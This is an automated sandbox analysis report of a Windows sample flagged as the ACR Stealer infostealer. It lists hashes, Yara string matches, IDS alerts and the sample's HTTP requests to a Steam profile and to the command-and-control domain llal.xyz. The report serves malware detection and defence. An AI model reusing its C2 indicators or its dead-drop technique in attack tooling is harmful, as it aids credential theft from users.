Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OXoeX1Ii3x.exe

Overview

General Information

Sample name:OXoeX1Ii3x.exe
renamed because original name is a hash value
Original sample name:3e9881b9c6ff4994fc9d684456694e77.exe
Analysis ID:1582973
MD5:3e9881b9c6ff4994fc9d684456694e77
SHA1:370244669daea5f87c797d6ad240adbfb7006384
SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
Tags:exeuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OXoeX1Ii3x.exe (PID: 7504 cmdline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe" MD5: 3E9881B9C6FF4994FC9D684456694E77)
    • WerFault.exe (PID: 7652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7504 -s 2016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OXoeX1Ii3x.exeinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.0.OXoeX1Ii3x.exe.140000.0.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
0.2.OXoeX1Ii3x.exe.140000.0.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-01T09:06:59.267860+010020526741A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-01T09:06:58.180719+010028032702Potentially Bad Traffic192.168.2.449730104.102.49.254443TCP
2025-01-01T09:06:59.267860+010028032702Potentially Bad Traffic192.168.2.449731188.114.97.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: OXoeX1Ii3x.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%Perma Link
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: OXoeX1Ii3x.exeJoe Sandbox ML: detected
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: OXoeX1Ii3x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00147A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00147A82

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.4:49731 -> 188.114.97.3:443
Performs DNS queries to domains with low reputation
Source: DNS query: llal.xyz
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49730 -> 104.102.49.254:443
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49731 -> 188.114.97.3:443
Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_001573CD InternetOpenUrlA,InternetReadFile,0_2_001573CD
Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: onnect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
Source: global trafficDNS traffic detected: DNS query: llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.000000000301E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.1870057539.0000000002CFC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://community.fa4
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682119129.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.0000000003027000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003031000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.1682164752.000000000306B000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1693087457.000000000307E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682079008.0000000003033000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1682003808.000000000302E000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.1681983401.000000000306D000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
